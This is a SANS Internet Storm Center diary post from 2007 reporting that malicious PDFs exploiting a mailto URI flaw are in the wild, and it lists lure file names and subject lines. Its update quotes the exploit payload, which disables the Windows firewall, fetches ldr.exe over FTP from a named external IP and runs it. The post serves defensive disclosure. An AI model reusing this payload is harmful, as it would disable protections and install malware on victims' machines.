Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

PDF mailto exploit documents in the wild

Published: 2007-10-23
Last Updated: 2007-10-24 00:18:25 UTC
by Adrien de Beaupre (Version: 2)
0 comment(s)

The vulnerability initially reported here and confirmed here (with workaround) and patched here now appears to have been spotted in the wild. The proof of concept code had been released, and a number of people have reported receiving the PDFs which exploit the vulnerability. Obviously please patch, apply the workarounds, and/or ensure you can detect and block the exploit. File names seen so far are "BILL.pdf" and "INVOICE.pdf".

Thanks Juha-Matti!

Update 1

The current exploit seen follows the following format (spaces added so anti-virus won't trigger):

obj<</URI(mailto :%/../../../../ ../../Windows /system32/cmd".exe"" /c /q \"@echo off&netsh firewall set opmode mode=disable&echo o 81. 95. 146. 130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat)/S/ URI>

Essentially it disables the Windows native firewall, uses FTP to download a file, and execute it. Gotcha.

Additional file names: "YOUR_BILL.pdf" and "STATEMET.pdf" some subject lines have been "INVOICE alacrity" "STATEMET indigene" and "INVOICE depredate"

Thanks Bojan!

Adrien de Beaupré
Bell Canada




0 comment(s)
Diary Archives